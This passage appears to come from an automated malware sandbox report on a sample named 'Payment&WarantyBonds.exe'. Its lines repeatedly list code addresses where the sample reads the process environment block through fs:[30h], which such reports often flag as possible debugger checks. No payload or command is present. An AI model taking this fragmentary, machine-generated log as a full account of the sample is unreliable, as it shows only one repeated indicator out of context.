                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014251ED mov eax, dword ptr fs:[00000030h]2_2_014251ED
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014C71F9 mov esi, dword ptr fs:[00000030h]2_2_014C71F9
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014501F8 mov eax, dword ptr fs:[00000030h]2_2_014501F8
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01460185 mov eax, dword ptr fs:[00000030h]2_2_01460185
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014DC188 mov eax, dword ptr fs:[00000030h]2_2_014DC188
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014DC188 mov eax, dword ptr fs:[00000030h]2_2_014DC188
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014A019F mov eax, dword ptr fs:[00000030h]2_2_014A019F
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014A019F mov eax, dword ptr fs:[00000030h]2_2_014A019F
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014A019F mov eax, dword ptr fs:[00000030h]2_2_014A019F
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014A019F mov eax, dword ptr fs:[00000030h]2_2_014A019F
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0141A197 mov eax, dword ptr fs:[00000030h]2_2_0141A197
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0141A197 mov eax, dword ptr fs:[00000030h]2_2_0141A197
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0141A197 mov eax, dword ptr fs:[00000030h]2_2_0141A197
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01477190 mov eax, dword ptr fs:[00000030h]2_2_01477190
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014D11A4 mov eax, dword ptr fs:[00000030h]2_2_014D11A4
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014D11A4 mov eax, dword ptr fs:[00000030h]2_2_014D11A4
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014D11A4 mov eax, dword ptr fs:[00000030h]2_2_014D11A4
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014D11A4 mov eax, dword ptr fs:[00000030h]2_2_014D11A4
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0143B1B0 mov eax, dword ptr fs:[00000030h]2_2_0143B1B0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01422050 mov eax, dword ptr fs:[00000030h]2_2_01422050
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014C705E mov ebx, dword ptr fs:[00000030h]2_2_014C705E
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014C705E mov eax, dword ptr fs:[00000030h]2_2_014C705E
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0144B052 mov eax, dword ptr fs:[00000030h]2_2_0144B052
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014A6050 mov eax, dword ptr fs:[00000030h]2_2_014A6050
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014A106E mov eax, dword ptr fs:[00000030h]2_2_014A106E
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014F5060 mov eax, dword ptr fs:[00000030h]2_2_014F5060
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01431070 mov eax, dword ptr fs:[00000030h]2_2_01431070
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01431070 mov ecx, dword ptr fs:[00000030h]2_2_01431070
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01431070 mov eax, dword ptr fs:[00000030h]2_2_01431070
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01431070 mov eax, dword ptr fs:[00000030h]2_2_01431070
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01431070 mov eax, dword ptr fs:[00000030h]2_2_01431070
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01431070 mov eax, dword ptr fs:[00000030h]2_2_01431070
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01431070 mov eax, dword ptr fs:[00000030h]2_2_01431070
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01431070 mov eax, dword ptr fs:[00000030h]2_2_01431070
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01431070 mov eax, dword ptr fs:[00000030h]2_2_01431070
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01431070 mov eax, dword ptr fs:[00000030h]2_2_01431070
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01431070 mov eax, dword ptr fs:[00000030h]2_2_01431070
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01431070 mov eax, dword ptr fs:[00000030h]2_2_01431070
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01431070 mov eax, dword ptr fs:[00000030h]2_2_01431070
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0144C073 mov eax, dword ptr fs:[00000030h]2_2_0144C073
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0149D070 mov ecx, dword ptr fs:[00000030h]2_2_0149D070
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014A4000 mov ecx, dword ptr fs:[00000030h]2_2_014A4000
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0143E016 mov eax, dword ptr fs:[00000030h]2_2_0143E016
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0143E016 mov eax, dword ptr fs:[00000030h]2_2_0143E016
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0143E016 mov eax, dword ptr fs:[00000030h]2_2_0143E016
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0143E016 mov eax, dword ptr fs:[00000030h]2_2_0143E016
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0141A020 mov eax, dword ptr fs:[00000030h]2_2_0141A020
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0141C020 mov eax, dword ptr fs:[00000030h]2_2_0141C020
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014E903E mov eax, dword ptr fs:[00000030h]2_2_014E903E
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014E903E mov eax, dword ptr fs:[00000030h]2_2_014E903E
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014E903E mov eax, dword ptr fs:[00000030h]2_2_014E903E
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014E903E mov eax, dword ptr fs:[00000030h]2_2_014E903E
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014370C0 mov eax, dword ptr fs:[00000030h]2_2_014370C0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014370C0 mov ecx, dword ptr fs:[00000030h]2_2_014370C0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014370C0 mov ecx, dword ptr fs:[00000030h]2_2_014370C0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014370C0 mov eax, dword ptr fs:[00000030h]2_2_014370C0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014370C0 mov ecx, dword ptr fs:[00000030h]2_2_014370C0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014370C0 mov ecx, dword ptr fs:[00000030h]2_2_014370C0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014370C0 mov eax, dword ptr fs:[00000030h]2_2_014370C0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014370C0 mov eax, dword ptr fs:[00000030h]2_2_014370C0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014370C0 mov eax, dword ptr fs:[00000030h]2_2_014370C0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014370C0 mov eax, dword ptr fs:[00000030h]2_2_014370C0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014370C0 mov eax, dword ptr fs:[00000030h]2_2_014370C0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014370C0 mov eax, dword ptr fs:[00000030h]2_2_014370C0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014370C0 mov eax, dword ptr fs:[00000030h]2_2_014370C0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014370C0 mov eax, dword ptr fs:[00000030h]2_2_014370C0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014370C0 mov eax, dword ptr fs:[00000030h]2_2_014370C0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014370C0 mov eax, dword ptr fs:[00000030h]2_2_014370C0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014370C0 mov eax, dword ptr fs:[00000030h]2_2_014370C0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014370C0 mov eax, dword ptr fs:[00000030h]2_2_014370C0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0149D0C0 mov eax, dword ptr fs:[00000030h]2_2_0149D0C0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0149D0C0 mov eax, dword ptr fs:[00000030h]2_2_0149D0C0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014A20DE mov eax, dword ptr fs:[00000030h]2_2_014A20DE
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014F50D9 mov eax, dword ptr fs:[00000030h]2_2_014F50D9
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014490DB mov eax, dword ptr fs:[00000030h]2_2_014490DB
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014450E4 mov eax, dword ptr fs:[00000030h]2_2_014450E4
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014450E4 mov ecx, dword ptr fs:[00000030h]2_2_014450E4
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0141A0E3 mov ecx, dword ptr fs:[00000030h]2_2_0141A0E3
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014A60E0 mov eax, dword ptr fs:[00000030h]2_2_014A60E0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014280E9 mov eax, dword ptr fs:[00000030h]2_2_014280E9
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0141C0F0 mov eax, dword ptr fs:[00000030h]2_2_0141C0F0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014620F0 mov ecx, dword ptr fs:[00000030h]2_2_014620F0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0142208A mov eax, dword ptr fs:[00000030h]2_2_0142208A
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014AD080 mov eax, dword ptr fs:[00000030h]2_2_014AD080
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014AD080 mov eax, dword ptr fs:[00000030h]2_2_014AD080
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0141D08D mov eax, dword ptr fs:[00000030h]2_2_0141D08D
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01425096 mov eax, dword ptr fs:[00000030h]2_2_01425096
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0144D090 mov eax, dword ptr fs:[00000030h]2_2_0144D090
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0144D090 mov eax, dword ptr fs:[00000030h]2_2_0144D090
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0145909C mov eax, dword ptr fs:[00000030h]2_2_0145909C
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014B80A8 mov eax, dword ptr fs:[00000030h]2_2_014B80A8
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014E60B8 mov eax, dword ptr fs:[00000030h]2_2_014E60B8
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014E60B8 mov ecx, dword ptr fs:[00000030h]2_2_014E60B8
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014A2349 mov eax, dword ptr fs:[00000030h]2_2_014A2349
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014A2349 mov eax, dword ptr fs:[00000030h]2_2_014A2349
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014A2349 mov eax, dword ptr fs:[00000030h]2_2_014A2349
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014A2349 mov eax, dword ptr fs:[00000030h]2_2_014A2349
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014A2349 mov eax, dword ptr fs:[00000030h]2_2_014A2349
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014A2349 mov eax, dword ptr fs:[00000030h]2_2_014A2349
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014A2349 mov eax, dword ptr fs:[00000030h]2_2_014A2349
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014A2349 mov eax, dword ptr fs:[00000030h]2_2_014A2349
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014A2349 mov eax, dword ptr fs:[00000030h]2_2_014A2349
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014A2349 mov eax, dword ptr fs:[00000030h]2_2_014A2349
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014A2349 mov eax, dword ptr fs:[00000030h]2_2_014A2349
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014A2349 mov eax, dword ptr fs:[00000030h]2_2_014A2349
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014A2349 mov eax, dword ptr fs:[00000030h]2_2_014A2349
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014A2349 mov eax, dword ptr fs:[00000030h]2_2_014A2349
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014A2349 mov eax, dword ptr fs:[00000030h]2_2_014A2349
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0141D34C mov eax, dword ptr fs:[00000030h]2_2_0141D34C
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0141D34C mov eax, dword ptr fs:[00000030h]2_2_0141D34C
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014F5341 mov eax, dword ptr fs:[00000030h]2_2_014F5341
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01419353 mov eax, dword ptr fs:[00000030h]2_2_01419353
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01419353 mov eax, dword ptr fs:[00000030h]2_2_01419353
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014A035C mov eax, dword ptr fs:[00000030h]2_2_014A035C
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014A035C mov eax, dword ptr fs:[00000030h]2_2_014A035C
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014A035C mov eax, dword ptr fs:[00000030h]2_2_014A035C
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014A035C mov ecx, dword ptr fs:[00000030h]2_2_014A035C
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014A035C mov eax, dword ptr fs:[00000030h]2_2_014A035C
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014A035C mov eax, dword ptr fs:[00000030h]2_2_014A035C
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014EA352 mov eax, dword ptr fs:[00000030h]2_2_014EA352
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014DF367 mov eax, dword ptr fs:[00000030h]2_2_014DF367
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014C437C mov eax, dword ptr fs:[00000030h]2_2_014C437C
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01427370 mov eax, dword ptr fs:[00000030h]2_2_01427370
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01427370 mov eax, dword ptr fs:[00000030h]2_2_01427370
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01427370 mov eax, dword ptr fs:[00000030h]2_2_01427370
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014A930B mov eax, dword ptr fs:[00000030h]2_2_014A930B
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014A930B mov eax, dword ptr fs:[00000030h]2_2_014A930B
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014A930B mov eax, dword ptr fs:[00000030h]2_2_014A930B
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0145A30B mov eax, dword ptr fs:[00000030h]2_2_0145A30B
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0145A30B mov eax, dword ptr fs:[00000030h]2_2_0145A30B
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0145A30B mov eax, dword ptr fs:[00000030h]2_2_0145A30B
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0141C310 mov ecx, dword ptr fs:[00000030h]2_2_0141C310
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01440310 mov ecx, dword ptr fs:[00000030h]2_2_01440310
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014E132D mov eax, dword ptr fs:[00000030h]2_2_014E132D
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014E132D mov eax, dword ptr fs:[00000030h]2_2_014E132D
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0144F32A mov eax, dword ptr fs:[00000030h]2_2_0144F32A
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01417330 mov eax, dword ptr fs:[00000030h]2_2_01417330
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014DC3CD mov eax, dword ptr fs:[00000030h]2_2_014DC3CD
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0142A3C0 mov eax, dword ptr fs:[00000030h]2_2_0142A3C0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0142A3C0 mov eax, dword ptr fs:[00000030h]2_2_0142A3C0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0142A3C0 mov eax, dword ptr fs:[00000030h]2_2_0142A3C0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0142A3C0 mov eax, dword ptr fs:[00000030h]2_2_0142A3C0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0142A3C0 mov eax, dword ptr fs:[00000030h]2_2_0142A3C0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0142A3C0 mov eax, dword ptr fs:[00000030h]2_2_0142A3C0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014283C0 mov eax, dword ptr fs:[00000030h]2_2_014283C0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014283C0 mov eax, dword ptr fs:[00000030h]2_2_014283C0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014283C0 mov eax, dword ptr fs:[00000030h]2_2_014283C0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014283C0 mov eax, dword ptr fs:[00000030h]2_2_014283C0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014A63C0 mov eax, dword ptr fs:[00000030h]2_2_014A63C0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014DB3D0 mov ecx, dword ptr fs:[00000030h]2_2_014DB3D0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014303E9 mov eax, dword ptr fs:[00000030h]2_2_014303E9
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014303E9 mov eax, dword ptr fs:[00000030h]2_2_014303E9
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014303E9 mov eax, dword ptr fs:[00000030h]2_2_014303E9
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014303E9 mov eax, dword ptr fs:[00000030h]2_2_014303E9
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014303E9 mov eax, dword ptr fs:[00000030h]2_2_014303E9
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014303E9 mov eax, dword ptr fs:[00000030h]2_2_014303E9
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014303E9 mov eax, dword ptr fs:[00000030h]2_2_014303E9
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014303E9 mov eax, dword ptr fs:[00000030h]2_2_014303E9
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014DF3E6 mov eax, dword ptr fs:[00000030h]2_2_014DF3E6
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014F53FC mov eax, dword ptr fs:[00000030h]2_2_014F53FC
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0143E3F0 mov eax, dword ptr fs:[00000030h]2_2_0143E3F0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0143E3F0 mov eax, dword ptr fs:[00000030h]2_2_0143E3F0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0143E3F0 mov eax, dword ptr fs:[00000030h]2_2_0143E3F0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014563FF mov eax, dword ptr fs:[00000030h]2_2_014563FF
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0141E388 mov eax, dword ptr fs:[00000030h]2_2_0141E388
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0141E388 mov eax, dword ptr fs:[00000030h]2_2_0141E388
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0141E388 mov eax, dword ptr fs:[00000030h]2_2_0141E388
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0144438F mov eax, dword ptr fs:[00000030h]2_2_0144438F
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0144438F mov eax, dword ptr fs:[00000030h]2_2_0144438F
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014F539D mov eax, dword ptr fs:[00000030h]2_2_014F539D
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01418397 mov eax, dword ptr fs:[00000030h]2_2_01418397
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01418397 mov eax, dword ptr fs:[00000030h]2_2_01418397
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01418397 mov eax, dword ptr fs:[00000030h]2_2_01418397
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0147739A mov eax, dword ptr fs:[00000030h]2_2_0147739A
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0147739A mov eax, dword ptr fs:[00000030h]2_2_0147739A
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014433A5 mov eax, dword ptr fs:[00000030h]2_2_014433A5
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014533A0 mov eax, dword ptr fs:[00000030h]2_2_014533A0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014533A0 mov eax, dword ptr fs:[00000030h]2_2_014533A0
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01419240 mov eax, dword ptr fs:[00000030h]2_2_01419240
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01419240 mov eax, dword ptr fs:[00000030h]2_2_01419240
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0145724D mov eax, dword ptr fs:[00000030h]2_2_0145724D
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014A8243 mov eax, dword ptr fs:[00000030h]2_2_014A8243
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014A8243 mov ecx, dword ptr fs:[00000030h]2_2_014A8243
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0141A250 mov eax, dword ptr fs:[00000030h]2_2_0141A250
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014DB256 mov eax, dword ptr fs:[00000030h]2_2_014DB256
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014DB256 mov eax, dword ptr fs:[00000030h]2_2_014DB256
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01426259 mov eax, dword ptr fs:[00000030h]2_2_01426259
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01424260 mov eax, dword ptr fs:[00000030h]2_2_01424260
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01424260 mov eax, dword ptr fs:[00000030h]2_2_01424260
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01424260 mov eax, dword ptr fs:[00000030h]2_2_01424260
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014ED26B mov eax, dword ptr fs:[00000030h]2_2_014ED26B
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014ED26B mov eax, dword ptr fs:[00000030h]2_2_014ED26B
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_0141826B mov eax, dword ptr fs:[00000030h]2_2_0141826B
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01449274 mov eax, dword ptr fs:[00000030h]2_2_01449274
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01461270 mov eax, dword ptr fs:[00000030h]2_2_01461270
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_01461270 mov eax, dword ptr fs:[00000030h]2_2_01461270
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014D0274 mov eax, dword ptr fs:[00000030h]2_2_014D0274
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014D0274 mov eax, dword ptr fs:[00000030h]2_2_014D0274
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014D0274 mov eax, dword ptr fs:[00000030h]2_2_014D0274
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014D0274 mov eax, dword ptr fs:[00000030h]2_2_014D0274
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014D0274 mov eax, dword ptr fs:[00000030h]2_2_014D0274
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014D0274 mov eax, dword ptr fs:[00000030h]2_2_014D0274
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014D0274 mov eax, dword ptr fs:[00000030h]2_2_014D0274
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014D0274 mov eax, dword ptr fs:[00000030h]2_2_014D0274
                Source: C:\Users\user\Desktop\Payment&WarantyBonds.exeCode function: 2_2_014D0274 mov eax, dword ptr fs:[00000030h]2_2_014D0274
